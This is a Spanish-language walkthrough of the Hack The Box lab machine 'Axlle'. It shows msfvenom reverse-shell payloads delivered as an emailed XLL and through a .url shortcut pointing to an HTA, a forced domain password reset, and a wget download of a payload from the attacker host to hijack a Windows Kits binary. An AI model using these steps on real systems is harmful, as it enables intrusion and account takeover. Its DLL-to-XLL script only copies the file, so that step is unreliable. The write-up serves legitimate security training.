Axlle
OS: Windows
Dificultad: Difícil
Puntos: 40
Nmap
ports=$(nmap -p- --min-rate=5000 -T4 10.10.11.21 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p $ports -sC -sV 10.10.11.21
Nmap scan report for 10.10.11.21
Host is up, received syn-ack (0.072s latency).
Scanned at 2024-06-27 14:13:15 EDT for 88s
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack hMailServer smtpd
| smtp-commands: MAINFRAME, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-favicon: Unknown favicon MD5: FAF2C069F86E802FD21BF15DC8EDD2DC
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: Axlle Development
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2024-06-27 18:13:22Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| ssl-cert: Subject: commonName=MAINFRAME.axlle.htb
| Issuer: commonName=MAINFRAME.axlle.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-19T11:25:03
| Not valid after: 2024-11-18T11:25:03
| MD5: acc1:ec10:1311:0c34:c548:bd34:8cce:53f9
| SHA-1: 9d6c:ac58:e52c:a711:9ffa:795f:171b:555c:cf0e:7fc9
Enumeration
Entrando a la pagina vemos el siguiente mensaje.
Esto significa que tenemos que explotar de alguna forma con documentos excel.
Excel XLL - EXEC
Despues de una busqueda llegamos al siguiente articulo https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/#xll-exec
Usaremos la siguiente forma para realizar el ataque Primero necesitamos crear nuestro dll.
┌──(root㉿kali)-[~/htb/Box/Axlle]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.159 LPORT=1234 -f dll -o reverse.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
Saved as: reverse.dll
Ahora con el siguiente script custom basado en este repo https://github.com/zimnyaa/xyrella convertimos el dll a xll.
# xyrella.py
import argparse
import os
import shutil
def convert_dll_to_xll(input_dll, output_xll):
# Ensure the input DLL file exists
if not os.path.exists(input_dll):
print(f"Error: Input DLL file '{input_dll}' not found.")
return
# Copy the DLL to the output XLL file (simulated conversion for example)
shutil.copyfile(input_dll, output_xll)
print(f"Converted '{input_dll}' to '{output_xll}' successfully.")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Convert DLL to XLL using Xyrella")
parser.add_argument('--input', '-i', required=True, help="Input DLL file path")
parser.add_argument('--output', '-o', required=True, help="Output XLL file path")
args = parser.parse_args()
input_dll = args.input
output_xll = args.output
convert_dll_to_xll(input_dll, output_xll)
Configuramos metasploit.
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 1234
run
Una vez que tenemos nuestro archivo xll podemos enviarlo por correo.
swaks --to accounts@axlle.htb --from doom@axlle.htb --server 10.10.11.21 --port 25 --header "Subject: Hola" --body "Hola" --attach @doom.xll
=== Trying 10.10.11.21:25...
=== Connected to 10.10.11.21.
<- 220 MAINFRAME ESMTP
-> EHLO kali
<- 250-MAINFRAME
<- 250-SIZE 20480000
<- 250-AUTH LOGIN
<- 250 HELP
-> MAIL FROM:<doom@axlle.htb>
<- 250 OK
-> RCPT TO:<accounts@axlle.htb>
<- 250 OK
-> DATA
<- 354 OK, send.
-> Date: Thu, 27 Jun 2024 15:58:14 -0400
-> To: accounts@axlle.htb
-> From: doom@axlle.htb
-> Subject: Hola
-> Message-Id: <20240627155814.056954@kali>
-> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
-> MIME-Version: 1.0
-> Content-Type: multipart/mixed; boundary="----=_MIME_BOUNDARY_000_56954"
->
-> ------=_MIME_BOUNDARY_000_56954
-> Content-Type: text/plain
->
-> Hola
-> ------=_MIME_BOUNDARY_000_56954
-> Content-Type: application/octet-stream; name="doom.xll"
-> Content-Description: doom.xll
-> Content-Disposition: attachment; filename="doom.xll"
-> Content-Transfer-Encoding: BASE64
->
-> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-> AAAA0AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
...
...
...
->
-> ------=_MIME_BOUNDARY_000_56954--
->
->
-> .
<- 250 Queued (10.484 seconds)
-> QUIT
<- 221 goodbye
=== Connection closed with remote host.
Obtenemos nuestra shell.
Lateral Movement
Podemos ver el siguiente mensaje accediendo a la ruta.
type "Program Files (x86)\hMailServer\Data\axlle.htb\dallon.matrix\2F\{2F7523BD-628F-4359-913E-A873FCC59D0F}.eml"
Hi everyone,
The Web Dev group is doing some development to figure out the best way to automate the checking and addition of URLs into the OSINT portal.
We ask that you drop any web shortcuts you have into the C:\inetpub\testing folder so we can test the automation.
Yours in click-worthy URLs,
The Web Dev Team
Esto nos da una pista de que podriamos hacer. En este articulo https://inquest.net/blog/shortcut-to-malice-url-files/ se mencionan varias formas de aprovechartos de los shortcut utilizaremos la de hta.
Shortcut URL HTA file
Primero generamos nuestra exe malicioso.
┌──(root㉿kali)-[~/htb/Box/Axlle]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.159 LPORT=4444 -f exe -o reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: reverse.exe
Lo cargamos al sistema desde nuestra meterpreter shell.
meterpreter > mkdir c:\\temp
Creating directory: c:\temp
meterpreter > upload reverse.exe c:\\temp
[*] Uploading : /root/htb/Box/Axlle/reverse.exe -> c:\temp\reverse.exe
[*] Completed : /root/htb/Box/Axlle/reverse.exe -> c:\temp\reverse.exe
Ahora ponemos a la escucha nuestro handler.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run -h
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.159:4444
Despues creamos nuestro hta file que consultara la victima.
<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
var c = "cmd.exe /c c:\\temp\\reverse.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>
Ponemos nuestro servidor smb donde accedera la victima al archivo hta.
┌──(root㉿kali)-[~/htb/Box/Axlle]
└─# impacket-smbserver -smb2support share .
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Por ultimo generamos nuestro shortcut.
$url = "file://10.10.14.159/share/doom.hta"
$shortcutPath = "C:\inetpub\testing\shell.url"
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent
Esperamos un momento y recibiremos el siguiente mensaje.
Conseguimos una shell.
Privilege Escalation
Utilizando bloodhound podemos ver que el usuario dallon puede cambiar el password de 2 usuarios.
Ahora modificaremos el password el alguno de los usuarios con PowerView.ps1.
meterpreter > upload PowerView.ps1 c:\\temp
[*] Uploading : /root/htb/Box/Axlle/PowerView.ps1 -> c:\temp\PowerView.ps1
[*] Completed : /root/htb/Box/Axlle/PowerView.ps1 -> c:\temp\PowerView.ps1
meterpreter > shell
C:\>cd temp
C:\temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\temp> import-module .\PowerView.ps1
import-module .\PowerView.ps1
PS C:\temp>
Cambiamos el password del usuario.
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity jacob.greeny -AccountPassword $UserPassword
Nos conectamos por winrm.
┌──(root㉿kali)-[~/htb/Box/Axlle]
└─# evil-winrm -i 10.10.11.21 -u jacob.greeny -p 'Password123!'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jacob.greeny\Documents>
Windows Kit’s Command Execute
Vemos que el usuario tiene permisos de escritura en el la siguiente carpeta.
icacls "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64"
Con ayuda del siguiente blog https://github.com/nasbench/Misc-Research/blob/main/LOLBINs/StandaloneRunner.md podemos aprovecharnos de eso.
Entonces basicamente podemos escribir en ese directorio alguno de los archivos y obtener una reverse shell. Utilizaremos nuevamente el exe que ya habiamos creado antes.
*Evil-WinRM* PS C:\Users\jacob.greeny\Documents> wget http://10.10.14.159/reverse.exe -O "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe"
*Evil-WinRM* PS C:\Users\jacob.greeny\Documents> dir "C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64"
Directory: C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/27/2024 2:39 PM 7168 standalonerunner.exe
-a---- 9/30/2023 3:08 AM 43632 standalonexml.dll
Esperamos unos minutos y obtenemos nuestra reverse shell. En caso de que no funcione vulve a escribir el archivo.